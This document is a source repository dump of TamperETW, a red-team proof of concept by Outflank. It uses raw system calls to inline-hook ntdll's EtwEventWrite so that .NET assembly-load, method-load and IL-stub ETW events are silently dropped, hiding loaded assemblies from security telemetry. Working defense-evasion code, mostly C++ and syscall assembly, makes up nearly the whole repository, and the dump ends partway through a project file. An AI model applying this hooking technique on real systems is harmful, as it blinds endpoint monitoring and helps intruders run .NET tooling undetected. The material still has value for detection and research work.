[
  {
    "path": ".gitattributes",
    "content": "# Auto detect text files and perform LF normalization\n* text=auto\n"
  },
  {
    "path": "README.md",
    "content": "# TamperETW\n## A proof of concept to demonstrate how CLR ETW events can be filtered/tampered\n\nMDSec's Adam Chester (@\\_xpn\\_) recently [published a great blog](https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/) on how Red Teams can hide the loading of .NET assemblies by disabling .NET ETW telemetry. In his blog he included proof of concept code which demonstrates how to dismantle ETW telemetry by patching the native EtwEventWrite function.\n\nBased on his research, I wrote an x64 version / proof of concept that uses native system calls to place an inline hook on the EtwEventWrite function.\n\nBy hooking EtwEventWrite and redirecting the program flow to our custom MyEtwEventWrite function, we can intercept the function arguments and inspect or change the data (EVENT_DESCRIPTOR and EVENT_DATA_DESCRIPTOR data structures). We then use the native EtwEventWriteFull function to selectively forward .NET ETW events. In this PoC we block a few ETW (CLR) event from being send, for example assembly loading events (AssemblyDCStart_V1), but with a bit more work it should be possible to spoof the assembly names before being submitted with EtwEventWriteFull.\n\n![alt text](https://github.com/outflanknl/TamperETW/raw/master/TamperETW.png \"Proof of Concept\")\n\n## Usage:\n\n```\nDownload the TamperETW folder and execute the TamperETW executable within the x64/releases folder (or recompile from source).\nWhen the MessageBox pops up, use Process Explorer or Process Hacker to watch the loaded .NET assemblies (ETW telemetry). \n```\n\n## Credits\nPoC Author: Cornelis de Plaa ([@Cneelis](https://twitter.com/Cneelis)) / Outflank. \nBased on research from: Adam Chester ([@\\_xpn\\_](https://twitter.com/_xpn_)) / MDSec\n"
  },
  {
    "path": "TamperETW/ManagedDLL/ManagedDLL.cs",
    "content": "using System.Windows.Forms;\n\nnamespace dllNamespace\n{\n    public class dllClass\n    {\n        public static int ShowMsg(string msg)\n        {\n            MessageBox.Show(msg);\n            return 0;\n        }\n    }\n}\n"
  },
  {
    "path": "TamperETW/ManagedDLL/ManagedDLL.csproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <Import Project=\"$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props\" Condition=\"Exists('$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props')\" />\n  <PropertyGroup>\n    <Configuration Condition=\" '$(Configuration)' == '' \">Debug</Configuration>\n    <Platform Condition=\" '$(Platform)' == '' \">AnyCPU</Platform>\n    <ProjectGuid>{1C5D8784-11CF-485B-9197-0727A88377C3}</ProjectGuid>\n    <OutputType>Library</OutputType>\n    <AppDesignerFolder>Properties</AppDesignerFolder>\n    <RootNamespace>ManagedDLL</RootNamespace>\n    <AssemblyName>ManagedDLL</AssemblyName>\n    <TargetFrameworkVersion>v4.0</TargetFrameworkVersion>\n    <FileAlignment>512</FileAlignment>\n    <Deterministic>true</Deterministic>\n  </PropertyGroup>\n  <PropertyGroup Condition=\" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' \">\n    <DebugSymbols>true</DebugSymbols>\n    <DebugType>full</DebugType>\n    <Optimize>false</Optimize>\n    <OutputPath>bin\\Debug\\</OutputPath>\n    <DefineConstants>DEBUG;TRACE</DefineConstants>\n    <ErrorReport>prompt</ErrorReport>\n    <WarningLevel>4</WarningLevel>\n  </PropertyGroup>\n  <PropertyGroup Condition=\" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' \">\n    <DebugType>pdbonly</DebugType>\n    <Optimize>true</Optimize>\n    <OutputPath>bin\\Release\\</OutputPath>\n    <DefineConstants>TRACE</DefineConstants>\n    <ErrorReport>prompt</ErrorReport>\n    <WarningLevel>4</WarningLevel>\n  </PropertyGroup>\n  <PropertyGroup>\n    <StartupObject />\n  </PropertyGroup>\n  <ItemGroup>\n    <Reference Include=\"System\" />\n    <Reference Include=\"System.Core\" />\n    <Reference Include=\"System.Windows.Forms\" />\n    <Reference Include=\"System.Xml.Linq\" />\n    <Reference Include=\"System.Data.DataSetExtensions\" />\n    <Reference Include=\"Microsoft.CSharp\" />\n    <Reference Include=\"System.Data\" />\n    <Reference Include=\"System.Xml\" />\n  </ItemGroup>\n  <ItemGroup>\n    <Compile Include=\"ManagedDLL.cs\" />\n    <Compile Include=\"Properties\\AssemblyInfo.cs\" />\n  </ItemGroup>\n  <Import Project=\"$(MSBuildToolsPath)\\Microsoft.CSharp.targets\" />\n</Project>"
  },
  {
    "path": "TamperETW/ManagedDLL/Properties/AssemblyInfo.cs",
    "content": "using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Information about an assembly is controlled through the following\n// set of attributes. Change these attribute values to modify the information\n// associated with an assembly.\n[assembly: AssemblyTitle(\"ManagedDLL\")]\n[assembly: AssemblyDescription(\"\")]\n[assembly: AssemblyConfiguration(\"\")]\n[assembly: AssemblyCompany(\"\")]\n[assembly: AssemblyProduct(\"ManagedDLL\")]\n[assembly: AssemblyCopyright(\"Copyright ©  2020\")]\n[assembly: AssemblyTrademark(\"\")]\n[assembly: AssemblyCulture(\"\")]\n\n// Setting ComVisible to false makes the types in this assembly not visible\n// to COM components.  If you need to access a type in this assembly from\n// COM, set the ComVisible attribute to true on that type.\n[assembly: ComVisible(false)]\n\n// The following GUID is for the ID of the typelib if this project is exposed to COM\n[assembly: Guid(\"1c5d8784-11cf-485b-9197-0727a88377c3\")]\n\n// Version information for an assembly consists of the following four values:\n//\n//      Major Version\n//      Minor Version\n//      Build Number\n//      Revision\n//\n// You can specify all the values or you can default the Build and Revision Numbers\n// by using the '*' as shown below:\n// [assembly: AssemblyVersion(\"1.0.*\")]\n[assembly: AssemblyVersion(\"1.0.0.0\")]\n[assembly: AssemblyFileVersion(\"1.0.0.0\")]\n"
  },
  {
    "path": "TamperETW/TamperETW.sln",
    "content": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio 15\nVisualStudioVersion = 15.0.28307.1062\nMinimumVisualStudioVersion = 10.0.40219.1\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"TamperETW\", \"UnmanagedCLR\\UnmanagedCLR.vcxproj\", \"{070FC08C-B93E-426A-9C86-48E9C5DBFEA1}\"\nEndProject\nProject(\"{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}\") = \"ManagedDLL\", \"ManagedDLL\\ManagedDLL.csproj\", \"{1C5D8784-11CF-485B-9197-0727A88377C3}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|Any CPU = Debug|Any CPU\n\t\tDebug|x64 = Debug|x64\n\t\tRelease|Any CPU = Release|Any CPU\n\t\tRelease|x64 = Release|x64\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{070FC08C-B93E-426A-9C86-48E9C5DBFEA1}.Debug|Any CPU.ActiveCfg = Debug|Win32\n\t\t{070FC08C-B93E-426A-9C86-48E9C5DBFEA1}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{070FC08C-B93E-426A-9C86-48E9C5DBFEA1}.Debug|x64.Build.0 = Debug|x64\n\t\t{070FC08C-B93E-426A-9C86-48E9C5DBFEA1}.Release|Any CPU.ActiveCfg = Release|Win32\n\t\t{070FC08C-B93E-426A-9C86-48E9C5DBFEA1}.Release|x64.ActiveCfg = Release|x64\n\t\t{070FC08C-B93E-426A-9C86-48E9C5DBFEA1}.Release|x64.Build.0 = Release|x64\n\t\t{1C5D8784-11CF-485B-9197-0727A88377C3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU\n\t\t{1C5D8784-11CF-485B-9197-0727A88377C3}.Debug|Any CPU.Build.0 = Debug|Any CPU\n\t\t{1C5D8784-11CF-485B-9197-0727A88377C3}.Debug|x64.ActiveCfg = Debug|Any CPU\n\t\t{1C5D8784-11CF-485B-9197-0727A88377C3}.Debug|x64.Build.0 = Debug|Any CPU\n\t\t{1C5D8784-11CF-485B-9197-0727A88377C3}.Release|Any CPU.ActiveCfg = Release|Any CPU\n\t\t{1C5D8784-11CF-485B-9197-0727A88377C3}.Release|Any CPU.Build.0 = Release|Any CPU\n\t\t{1C5D8784-11CF-485B-9197-0727A88377C3}.Release|x64.ActiveCfg = Release|Any CPU\n\t\t{1C5D8784-11CF-485B-9197-0727A88377C3}.Release|x64.Build.0 = Release|Any CPU\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\n\tGlobalSection(ExtensibilityGlobals) = postSolution\n\t\tSolutionGuid = {302837D1-D6DF-4790-97CD-55C68E0420B1}\n\tEndGlobalSection\nEndGlobal\n"
  },
  {
    "path": "TamperETW/UnmanagedCLR/Syscalls.asm",
    "content": ".code\n\n; Reference: https://j00ru.vexillium.org/syscalls/nt/64/\n\n; Windows 7 SP1 / Server 2008 R2 specific syscalls\n\nZwProtectVirtualMemory7SP1 proc\n\t\tmov r10, rcx\n\t\tmov eax, 4Dh\n\t\tsyscall\n\t\tret\nZwProtectVirtualMemory7SP1 endp\n\nZwWriteVirtualMemory7SP1 proc\n\t\tmov r10, rcx\n\t\tmov eax, 37h\n\t\tsyscall\n\t\tret\nZwWriteVirtualMemory7SP1 endp\n\nZwReadVirtualMemory7SP1 proc\n\t\tmov r10, rcx\n\t\tmov eax, 3Ch\n\t\tsyscall\n\t\tret\nZwReadVirtualMemory7SP1 endp\n\n; Windows 8 / Server 2012 specific syscalls\n\nZwProtectVirtualMemory80 proc\n\t\tmov r10, rcx\n\t\tmov eax, 4Eh\n\t\tsyscall\n\t\tret\nZwProtectVirtualMemory80 endp\n\nZwWriteVirtualMemory80 proc\n\t\tmov r10, rcx\n\t\tmov eax, 38h\n\t\tsyscall\n\t\tret\nZwWriteVirtualMemory80 endp\n\nZwReadVirtualMemory80 proc\n\t\tmov r10, rcx\n\t\tmov eax, 3Dh\n\t\tsyscall\n\t\tret\nZwReadVirtualMemory80 endp\n\n; Windows 8.1 / Server 2012 R2 specific syscalls\n\nZwProtectVirtualMemory81 proc\n\t\tmov r10, rcx\n\t\tmov eax, 4Fh\n\t\tsyscall\n\t\tret\nZwProtectVirtualMemory81 endp\n\nZwWriteVirtualMemory81 proc\n\t\tmov r10, rcx\n\t\tmov eax, 39h\n\t\tsyscall\n\t\tret\nZwWriteVirtualMemory81 endp\n\nZwReadVirtualMemory81 proc\n\t\tmov r10, rcx\n\t\tmov eax, 3Eh\n\t\tsyscall\n\t\tret\nZwReadVirtualMemory81 endp\n\n; Windows 10 / Server 2016 specific syscalls\n \nZwProtectVirtualMemory10 proc\n\t\tmov r10, rcx\n\t\tmov eax, 50h\n\t\tsyscall\n\t\tret\nZwProtectVirtualMemory10 endp\n\nZwWriteVirtualMemory10 proc\n\t\tmov r10, rcx\n\t\tmov eax, 3Ah\n\t\tsyscall\n\t\tret\nZwWriteVirtualMemory10 endp\n\nZwReadVirtualMemory10 proc\n\t\tmov r10, rcx\n\t\tmov eax, 3Fh\n\t\tsyscall\n\t\tret\nZwReadVirtualMemory10 endp\n\nend\n"
  },
  {
    "path": "TamperETW/UnmanagedCLR/TamperETW.cpp",
    "content": "#undef  _UNICODE\n#define _UNICODE\n#undef  UNICODE\n#define UNICODE\n\n// https://docs.microsoft.com/en-us/dotnet/framework/performance/etw-events-in-the-common-language-runtime\n#define ModuleLoad_V2 152\n#define AssemblyDCStart_V1 155\n#define MethodLoadVerbose_V1 143\n#define MethodJittingStarted 145\n#define ILStubGenerated 88\n\n#include <Windows.h>\n#include <stdio.h>\n#include <metahost.h>\n#include <evntprov.h>\n#include \"TamperETW.h\"\n\n#pragma comment(lib, \"mscoree.lib\")\n\n// mov rax, <Hooked function address>  \n// jmp rax\nUCHAR uHook[] = {\n\t0x48, 0xb8, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0xFF, 0xE0\n};\n\nULONG NTAPI MyEtwEventWrite(\n\t__in REGHANDLE RegHandle,\n\t__in PCEVENT_DESCRIPTOR EventDescriptor,\n\t__in ULONG UserDataCount,\n\t__in_ecount_opt(UserDataCount) PEVENT_DATA_DESCRIPTOR UserData) \n{\n\tULONG uResult = 0;\n\n\t_EtwEventWriteFull EtwEventWriteFull = (_EtwEventWriteFull)\n\t\tGetProcAddress(GetModuleHandle(L\"ntdll.dll\"), \"EtwEventWriteFull\");\n\tif (EtwEventWriteFull == NULL) {\n\t\treturn 1;\n\t}\n\n\tswitch (EventDescriptor->Id) {\n\tcase AssemblyDCStart_V1:\n\t\t// Block CLR assembly loading events.\n\t\tbreak;\n\tcase MethodLoadVerbose_V1:\n\t\t// Block CLR method loading events.\n\t\tbreak;\n\tcase ILStubGenerated:\n\t\t// Block MSIL stub generation events.\n\t\tbreak;\n\tdefault:\n\t\t// Forward all other ETW events using EtwEventWriteFull.\n\t\tuResult = EtwEventWriteFull(RegHandle, EventDescriptor, 0, NULL, NULL, UserDataCount, UserData);\n\t}\n\n\treturn uResult;\n}\n\nBOOL InlineHook(LPVOID lpFuncAddress) {\n\tPNT_TIB pTIB = NULL;\n\tPTEB pTEB = NULL;\n\tPPEB pPEB = NULL;\n\n\t// Get pointer to the TEB\n\tpTIB = (PNT_TIB)__readgsqword(0x30);\n\tpTEB = (PTEB)pTIB->Self;\n\n\t// Get pointer to the PEB\n\tpPEB = (PPEB)pTEB->ProcessEnvironmentBlock;\n\tif (pPEB == NULL) {\n\t\treturn FALSE;\n\t}\n\n\tif (pPEB->OSMajorVersion == 10 && pPEB->OSMinorVersion == 0) {\n\t\tZwProtectVirtualMemory = &ZwProtectVirtualMemory10;\n\t\tZwWriteVirtualMemory = &ZwWriteVirtualMemory10;\n\t}\n\telse if (pPEB->OSMajorVersion == 6 && pPEB->OSMinorVersion == 1 && pPEB->OSBuildNumber == 7601) {\n\t\tZwProtectVirtualMemory = &ZwProtectVirtualMemory7SP1;\n\t\tZwWriteVirtualMemory = &ZwWriteVirtualMemory7SP1;\n\t}\n\telse if (pPEB->OSMajorVersion == 6 && pPEB->OSMinorVersion == 2) {\n\t\tZwProtectVirtualMemory = &ZwProtectVirtualMemory80;\n\t\tZwWriteVirtualMemory = &ZwWriteVirtualMemory80;\n\t}\n\telse if (pPEB->OSMajorVersion == 6 && pPEB->OSMinorVersion == 3) {\n\t\tZwProtectVirtualMemory = &ZwProtectVirtualMemory81;\n\t\tZwWriteVirtualMemory = &ZwWriteVirtualMemory81;\n\t}\n\telse {\n\t\treturn FALSE;\n\t}\n\n\tLPVOID lpBaseAddress = lpFuncAddress;\n\tULONG OldProtection, NewProtection;\n\tSIZE_T uSize = sizeof(uHook);\n\tNTSTATUS status = ZwProtectVirtualMemory(NtCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);\n\tif (status != STATUS_SUCCESS) {\n\t\treturn FALSE;\n\t}\n\n\tstatus = ZwWriteVirtualMemory(NtCurrentProcess(), lpFuncAddress, (PVOID)uHook, sizeof(uHook), NULL);\n\tif (status != STATUS_SUCCESS) {\n\t\treturn FALSE;\n\t}\n\n\tstatus = ZwProtectVirtualMemory(NtCurrentProcess(), &lpBaseAddress, &uSize, OldProtection, &NewProtection);\n\tif (status != STATUS_SUCCESS) {\n\t\treturn FALSE;\n\t}\n\n\treturn TRUE;\n}\n\n\nint wmain(int argc, wchar_t* argv[]) {\n\tBOOL bResult = FALSE;\n\tHRESULT hr;\n\tICLRMetaHost *pMetaHost = NULL;\n\tIEnumUnknown *installedRuntimes = NULL;\n\tICLRRuntimeInfo *runtimeInfo = NULL;\n\tICLRRuntimeHost *runtimeHost = NULL;\n\tULONG fetched = 0;\n\tDWORD pReturnValue = 0;\n\tLPWSTR lpwMessage = NULL;\n\n\twprintf(L\"[+] Patching EtwEventWrite\\n\");\n\tLPVOID lpFuncAddress = GetProcAddress(LoadLibrary(L\"ntdll.dll\"), \"EtwEventWrite\");\n\n\t// Add address of hook function to patch.\n\t*(DWORD64*)&uHook[2] = (DWORD64)MyEtwEventWrite;\n\n\tif (!InlineHook(lpFuncAddress)) {\n\t\twprintf(L\"[!] Error: Patching EtwEventWrite failed...\\n\");\n\t}\n\n\twprintf(L\"[+] Now Loading CLR...\\n\");\n\n\thr = CLRCreateInstance(CLSID_CLRMetaHost, IID_ICLRMetaHost, (LPVOID*)&pMetaHost);\n\tif (hr != S_OK) {\n\t\twprintf(L\"[!] Error: CLRCreateInstance...\\n\");\n\t\tgoto Cleanup;\n\t}\n\n\thr = pMetaHost->EnumerateInstalledRuntimes(&installedRuntimes);\n\tif (hr != S_OK) {\n\t\twprintf(L\"[!] Error: EnumerateInstalledRuntimes...\\n\");\n\t\tgoto Cleanup;\n\t}\n\n\tWCHAR versionString[20];\n\twhile ((hr = installedRuntimes->Next(1, (IUnknown **)&runtimeInfo, &fetched)) == S_OK && fetched > 0) {\n\t\tDWORD versionStringSize = 20;\n\t\thr = runtimeInfo->GetVersionString(versionString, &versionStringSize);\n\t\t\n\t\tif (runtimeInfo != NULL) {\n\t\t\twprintf(L\"[+] Supported Framework: %s\\n\", versionString);\n\t\t}\n\n\t\tif (versionStringSize >= 2 && versionString[1] == '4') {\t// Look for .NET 4.0 runtime.\n\t\t\twprintf(L\"[+] Using runtime: %s\\n\", versionString);\n\t\t\tbreak;\n\t\t}\n\t}\n\n\thr = runtimeInfo->GetInterface(CLSID_CLRRuntimeHost, IID_ICLRRuntimeHost, (void **)&runtimeHost);\n\tif (hr != S_OK) {\n\t\twprintf(L\"[!] Error: GetInterface(CLSID_CLRRuntimeHost...) failed...\\n\");\n\t\tgoto Cleanup;\n\t}\n\n\thr = runtimeHost->Start();\n\tif (hr != S_OK) {\n\t\twprintf(L\"[!] Error: Start runtimeHost failed...\\n\");\n\t\tgoto Cleanup;\n\t}\n\n\tlpwMessage = (LPWSTR)calloc(1, MAX_PATH * 2);\n\twcscpy_s(lpwMessage, 128, L\"Hello from .NET Framework: \");\n\twcscat_s(lpwMessage, 64, versionString);\n\twcscat_s(lpwMessage, 128, L\"\\nCheck ETW telemetry for loaded .NET assemblies.\");\n\n\twprintf(L\"\\n[+] ====== Calling .NET Code ======\\n\");\n\thr = runtimeHost->ExecuteInDefaultAppDomain(\n\t\tL\"..\\\\..\\\\ManagedDLL\\\\bin\\\\Release\\\\ManagedDLL.dll\",\n\t\tL\"dllNamespace.dllClass\",\n\t\tL\"ShowMsg\",\n\t\tlpwMessage,\n\t\t&pReturnValue);\n\n\tif (hr != S_OK) {\n\t\twprintf(L\"[!] Error: ExecuteInDefaultAppDomain failed...\\n\");\n\t\tgoto Cleanup;\n\t}\n\n\twprintf(L\"[+] Done\\n\");\n\n\tfree(lpwMessage);\n\thr = runtimeHost->Stop();\n\thr = runtimeHost->Release();\n\nCleanup:\n\n\tif (pMetaHost) {\n\t\tpMetaHost->Release();\n\t\tpMetaHost = NULL;\n\t}\n\n\treturn 0;\n}"
  },
  {
    "path": "TamperETW/UnmanagedCLR/TamperETW.h",
    "content": "#pragma once\n\n#include <Windows.h>\n\n#define STATUS_SUCCESS 0\n#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )\n\ntypedef struct _UNICODE_STRING {\n\tUSHORT Length;\n\tUSHORT MaximumLength;\n\tPWSTR  Buffer;\n} UNICODE_STRING, *PUNICODE_STRING;\n\ntypedef const UNICODE_STRING* PCUNICODE_STRING;\n\ntypedef struct _PEB_LDR_DATA {\n\tULONG Length;\n\tBOOLEAN Initialized;\n\tHANDLE SsHandle;\n\tLIST_ENTRY InLoadOrderModuleList;\n\tLIST_ENTRY InMemoryOrderModuleList;\n\tLIST_ENTRY InInitializationOrderModuleList;\n\tPVOID EntryInProgress;\n\tBOOLEAN ShutdownInProgress;\n\tHANDLE ShutdownThreadId;\n} PEB_LDR_DATA, *PPEB_LDR_DATA;\n\ntypedef struct _RTL_USER_PROCESS_PARAMETERS {\n\tBYTE           Reserved1[16];\n\tPVOID          Reserved2[10];\n\tUNICODE_STRING ImagePathName;\n\tUNICODE_STRING CommandLine;\n} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;\n\ntypedef struct _API_SET_NAMESPACE {\n\tULONG Version;\n\tULONG Size;\n\tULONG Flags;\n\tULONG Count;\n\tULONG EntryOffset;\n\tULONG HashOffset;\n\tULONG HashFactor;\n} API_SET_NAMESPACE, *PAPI_SET_NAMESPACE;\n\n// Partial PEB\ntypedef struct _PEB {\n\tBOOLEAN InheritedAddressSpace;\n\tBOOLEAN ReadImageFileExecOptions;\n\tBOOLEAN BeingDebugged;\n\tunion\n\t{\n\t\tBOOLEAN BitField;\n\t\tstruct\n\t\t{\n\t\t\tBOOLEAN ImageUsesLargePages : 1;\n\t\t\tBOOLEAN IsProtectedProcess : 1;\n\t\t\tBOOLEAN IsLegacyProcess : 1;\n\t\t\tBOOLEAN IsImageDynamicallyRelocated : 1;\n\t\t\tBOOLEAN SkipPatchingUser32Forwarders : 1;\n\t\t\tBOOLEAN SpareBits : 3;\n\t\t};\n\t};\n\tHANDLE Mutant;\n\n\tPVOID ImageBaseAddress;\n\tPPEB_LDR_DATA Ldr;\n\tPRTL_USER_PROCESS_PARAMETERS ProcessParameters;\n\tPVOID SubSystemData;\n\tPVOID ProcessHeap;\n\tPRTL_CRITICAL_SECTION FastPebLock;\n\tPVOID IFEOKey;\n\tPSLIST_HEADER AtlThunkSListPtr;\n\tunion\n\t{\n\t\tULONG CrossProcessFlags;\n\t\tstruct\n\t\t{\n\t\t\tULONG ProcessInJob : 1;\n\t\t\tULONG ProcessInitializing : 1;\n\t\t\tULONG ProcessUsingVEH : 1;\n\t\t\tULONG ProcessUsingVCH : 1;\n\t\t\tULONG ProcessUsingFTH : 1;\n\t\t\tULONG ProcessPreviouslyThrottled : 1;\n\t\t\tULONG ProcessCurrentlyThrottled : 1;\n\t\t\tULONG ProcessImagesHotPatched : 1;\n\t\t\tULONG ReservedBits0 : 24;\n\t\t};\n\t};\n\tunion\n\t{\n\t\tPVOID KernelCallbackTable;\n\t\tPVOID UserSharedInfoPtr;\n\t};\n\tULONG SystemReserved;\n\tULONG AtlThunkSListPtr32;\n\tPAPI_SET_NAMESPACE ApiSetMap;\n\tULONG TlsExpansionCounter;\n\tPVOID TlsBitmap;\n\tULONG TlsBitmapBits[2];\n\tPVOID ReadOnlySharedMemoryBase;\n\tPVOID SharedData;\n\tPVOID *ReadOnlyStaticServerData;\n\tPVOID AnsiCodePageData;\n\tPVOID OemCodePageData;\n\tPVOID UnicodeCaseTableData;\n\tULONG NumberOfProcessors;\n\tULONG NtGlobalFlag;\n\tULARGE_INTEGER CriticalSectionTimeout;\n\tSIZE_T HeapSegmentReserve;\n\tSIZE_T HeapSegmentCommit;\n\tSIZE_T HeapDeCommitTotalFreeThreshold;\n\tSIZE_T HeapDeCommitFreeBlockThreshold;\n\tULONG NumberOfHeaps;\n\tULONG MaximumNumberOfHeaps;\n\tPVOID *ProcessHeaps;\n\tPVOID GdiSharedHandleTable;\n\tPVOID ProcessStarterHelper;\n\tULONG GdiDCAttributeList;\n\tPRTL_CRITICAL_SECTION LoaderLock;\n\tULONG OSMajorVersion;\n\tULONG OSMinorVersion;\n\tUSHORT OSBuildNumber;\n} PEB, *PPEB;\n\ntypedef struct _LDR_DATA_TABLE_ENTRY {\n\tLIST_ENTRY InLoadOrderLinks;\n\tLIST_ENTRY InMemoryOrderLinks;\n\tunion\n\t{\n\t\tLIST_ENTRY InInitializationOrderLinks;\n\t\tLIST_ENTRY InProgressLinks;\n\t};\n\tPVOID DllBase;\n\tPVOID EntryPoint;\n\tULONG SizeOfImage;\n\tUNICODE_STRING FullDllName;\n\tUNICODE_STRING BaseDllName;\n\tULONG Flags;\n\tWORD LoadCount;\n\tWORD TlsIndex;\n\tunion\n\t{\n\t\tLIST_ENTRY HashLinks;\n\t\tstruct\n\t\t{\n\t\t\tPVOID SectionPointer;\n\t\t\tULONG CheckSum;\n\t\t};\n\t};\n\tunion\n\t{\n\t\tULONG TimeDateStamp;\n\t\tPVOID LoadedImports;\n\t};\n} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;\n\ntypedef struct _TEB {\n\tPVOID Reserved1[12];\n\tPPEB  ProcessEnvironmentBlock;\n\tPVOID Reserved2[399];\n\tBYTE  Reserved3[1952];\n\tPVOID TlsSlots[64];\n\tBYTE  Reserved4[8];\n\tPVOID Reserved5[26];\n\tPVOID ReservedForOle;\n\tPVOID Reserved6[4];\n\tPVOID TlsExpansionSlots;\n} TEB, *PTEB;\n\ntypedef ULONG(NTAPI *_EtwEventWrite)(\n\t__in REGHANDLE RegHandle,\n\t__in PCEVENT_DESCRIPTOR EventDescriptor,\n\t__in ULONG UserDataCount,\n\t__in_ecount_opt(UserDataCount) PEVENT_DATA_DESCRIPTOR UserData\n);\n\ntypedef ULONG(NTAPI *_EtwEventWriteFull)(\n\t__in REGHANDLE RegHandle,\n\t__in PCEVENT_DESCRIPTOR EventDescriptor,\n\t__in USHORT EventProperty,\n\t__in_opt LPCGUID ActivityId,\n\t__in_opt LPCGUID RelatedActivityId,\n\t__in ULONG UserDataCount,\n\t__in_ecount_opt(UserDataCount) PEVENT_DATA_DESCRIPTOR UserData\n);\n\n// Windows 7 SP1 / Server 2008 R2 specific Syscalls\nEXTERN_C NTSTATUS ZwProtectVirtualMemory7SP1(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);\nEXTERN_C NTSTATUS ZwReadVirtualMemory7SP1(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);\nEXTERN_C NTSTATUS ZwWriteVirtualMemory7SP1(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);\n\n// Windows 8 / Server 2012 specific Syscalls\nEXTERN_C NTSTATUS ZwProtectVirtualMemory80(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);\nEXTERN_C NTSTATUS ZwReadVirtualMemory80(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);\nEXTERN_C NTSTATUS ZwWriteVirtualMemory80(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);\n\n\n// Windows 8.1 / Server 2012 R2 specific Syscalls\nEXTERN_C NTSTATUS ZwProtectVirtualMemory81(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);\nEXTERN_C NTSTATUS ZwReadVirtualMemory81(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);\nEXTERN_C NTSTATUS ZwWriteVirtualMemory81(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);\n\n\n// Windows 10 / Server 2016 specific Syscalls\nEXTERN_C NTSTATUS ZwProtectVirtualMemory10(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);\nEXTERN_C NTSTATUS ZwReadVirtualMemory10(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);\nEXTERN_C NTSTATUS ZwWriteVirtualMemory10(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);\n\nNTSTATUS(*ZwProtectVirtualMemory)(\n\tIN HANDLE ProcessHandle,\n\tIN PVOID* BaseAddress,\n\tIN SIZE_T* NumberOfBytesToProtect,\n\tIN ULONG NewAccessProtection,\n\tOUT PULONG OldAccessProtection\n\t);\n\nNTSTATUS(*ZwReadVirtualMemory)(\n\tHANDLE hProcess,\n\tPVOID lpBaseAddress,\n\tPVOID lpBuffer,\n\tSIZE_T NumberOfBytesToRead,\n\tPSIZE_T NumberOfBytesRead\n\t);\n\nNTSTATUS(*ZwWriteVirtualMemory)(\n\tHANDLE hProcess,\n\tPVOID lpBaseAddress,\n\tPVOID lpBuffer,\n\tSIZE_T NumberOfBytesToWrite,\n\tPSIZE_T NumberOfBytesWritten\n\t);"
  },
  {
    "path": "TamperETW/UnmanagedCLR/UnmanagedCLR.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  